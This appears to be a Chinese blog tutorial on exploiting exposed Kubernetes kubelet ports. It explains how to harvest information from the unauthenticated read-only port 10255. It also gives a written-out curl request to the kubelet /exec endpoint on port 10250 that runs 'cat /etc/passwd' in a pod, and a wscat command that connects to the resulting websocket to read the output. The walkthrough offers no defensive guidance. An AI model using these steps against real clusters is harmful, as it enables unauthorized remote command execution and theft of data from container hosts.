kubelet漏洞利用
一、简介
kubernetes 是一个分布式的集群管理系统,在每个节点(node)上都要运行一个kubelet对容器进行生命周期的管理。
kubelet开放的端口有:
端口 | 作用 | 描述 |
---|---|---|
4194 | cAdvisor 监听 | kublet 通过该端口可以获取到该节点的环境信息以及 node 上运行的容器状态等内容,访问 http://localhost:4194 可以看到 cAdvisor 的管理界面,通过 kubelet 的启动参数 --cadvisor-port 可以指定启动的端口。 |
10248 | 健康检查端口 | 健康检查通过访问该端口可以判断 kubelet 是否正常工作,通过 kubelet 的启动参数 --healthz-port 和 --healthz-bind-address 来指定监听的地址和端口。 |
10250 | kubelet API | kubelet server 与 apiserver 通信的端口,定期请求 apiserver 获取自己所应当处理的任务,通过该端口可以访问获取node资源以及状态。 |
10255 | readonly API | 提供了pod和node的信息,接口以只读形式暴露出去,访问该端口不需要认证和鉴权。 |
二、漏洞利用
kubernetes主要漏洞有端口开放泄露敏感信息,10255端口如果对外开放,攻击者利用公开api可以获取敏感信息。更严重的漏洞是开放10250端口,可能存在远程命令执行漏洞。通过以使用kubernetes的某应用为例说明漏洞的利用方法。
首先确定该应用使用了kubernetes,并开放了4个端口。
1、10255端口泄露敏感信息
该漏洞利用比较简单,直接在浏览器中访问:http://X.X.X.X:10255/logs/ ,或者其他api也行,查看是否存在响应数据,如果存在,则暴露出敏感信息。
2、远程命令执行漏洞
该漏洞的利用相对复杂一点,首先需要访问https://X.X.X.X:10250/pods/,确认10250端口对外开放。如果开放,则进行下一步,需要一台linux主机执行以下指令:
curl --insecure -v -H "X-Stream-Protocol-Version: v2.channel.k8s.io" -H "X-Stream-Protocol-Version: channel.k8s.io" -X POST "https://X.X.X.X:10250/exec/namespace/podname/container-name?command=cat&command=/etc/passwd&input=1&output=1&tty=1"
command就是要远程执行的命令,本例是cat /etc/passwd。很明显需要确定三个参数,namespace、podname和container-name,此时又需要在https://X.X.X.X:10250/pods/页面中选择一个pod,如下图:
构造好curl请求之后,得到执行结果,其中location就是所需要的websocket地址。
然后在使用wscat工具连接websocket。如果在windows下安装wscat,需要先安装node和npm。wscat命令为:
wscat -c “https://X.X.X.X:10250/location的值” --no-check
查看响应值,得到/etc/passwd,确定命令执行成功。
kubelet漏洞利用相关推荐
- CORS漏洞利用检测和利用方式
CORS全称Cross-Origin Resource Sharing, 跨域资源共享,是HTML5的一个新特性,已被所有浏览器支持,不同于古老的jsonp只能get请求. 检测方式: 1.curl访 ...
- 流行漏洞利用工具包瞄准Flash、Java和IE
Digital Shadows研究了"In the Business of Exploitation"中22个漏洞利用工具包,发现共有76个被瞄准的漏洞.最常被利用的软件应该不会太 ...
- Flash Player漏洞利用Exploiting Flash Reliably
以下消息来自幻影论坛[Ph4nt0m]邮件组 前两天推荐过Mark Dowd的Paper "Exploiting Flash Reliably" [url]http://hi. ...
- 溢出漏洞利用小结(基础)
shell 获取小结 这里总结几种常见的获取 shell 的方式: 执行 shellcode,这一方面也会有不同的情况 可以直接返回 shell 可以将 shell 返回到某一个端口 shellcod ...
- 7. Vulnerability exploitation tools (漏洞利用工具 11个)
Metasploit于2004年发布时,将风暴带入了安全世界.它是开发,测试和使用漏洞利用代码的高级开源平台. 可以将有效载荷,编码器,无操作生成器和漏洞利用的可扩展模型集成在一起,使得Metaspl ...
- ASP.net 资源请求漏洞利用工具PadBuster
ASP.net 资源请求漏洞利用工具PadBuster 在ASP.net 网站中,为了便于部署网站项目,开发者往往会将资源(图片.Javascript文件)嵌入到dll文件中.而网页中,会使用WebR ...
- ewebeditor编辑器ASP/ASPX/PHP/JSP版本漏洞利用总结及解决方法
ewebeditor编辑器ASP/ASPX/PHP/JSP版本漏洞利用总结及解决方法 参考文章: (1)ewebeditor编辑器ASP/ASPX/PHP/JSP版本漏洞利用总结及解决方法 (2)ht ...
- S2-045漏洞利用工具解决方案
S2-045漏洞利用工具&解决方案 参考文章: (1)S2-045漏洞利用工具&解决方案 (2)https://www.cnblogs.com/sevck/p/6516268.html ...
- WPS漏洞利用工具Bully常见命令集合
WPS漏洞利用工具Bully常见命令集合 Bully是一款利用路由的WPS漏洞来破解WiFi密码工具.相比Reaver工具,Bully提升了资源使用效率,并提供了更丰富的设置选项.
最新文章
- 【rsyslogd】rsyslog 中 timereported 与 timegenerated 区别
- @codeforces - 1106F@ Lunar New Year and a Recursive Sequence
- JavaWeb学习笔记——Tomcat配置
- 1-3-JavaScript技术
- [Fondar]手机屏幕驱动板HDMI接口USB触摸使用步骤
- iphone用计算机显示器,如何将iPhone屏幕投射到电脑上
- 文件过大 不能导入U盘怎么办
- python关键词排名批量查排名_Python批量查询百度排名
- ipsec ikev2 中转
- 不占广告位增加网站收入揭秘
- 移动机器人五种坐标系
- centos7安装activemq以及无法访问前台页面
- php高仿互站网源码,2020新版友价高仿互站网源码 虚拟交易商城整站源码
- HAProxy入门(一)
- F007-正本清源说奥派 #F1170
- 机器学习:BP神经网络,CNN卷积神经网络,GAN生成对抗网络
- Linux网络故障排查
- uni-app 打包H5项目
- 【计算机网络】家用路由器的NAT模式和路由模式
- Android框架源码分析——从设计模式角度看 Retrofit 核心源码
热门文章
- C语言之return用法
- python 设备采集系统_真实世界的Python仪器监控:数据采集与控制系统自动化
- np.meshgrid()
- IT行业项目解决方案编写策略
- cesium 开发记录报错:DeveloperError: Appearance/Geometry mismatch.
- 你真正了解低代码么?(国内低代码平台状况分析)
- 带你快速入门数控编程
- unity Android平台最佳效果探索(二)
- 三百英雄服务器维护2020,300英雄将在2020.10.2停机更新
- 全国计算机等级一级考试中的基本操作题是如何保存提交?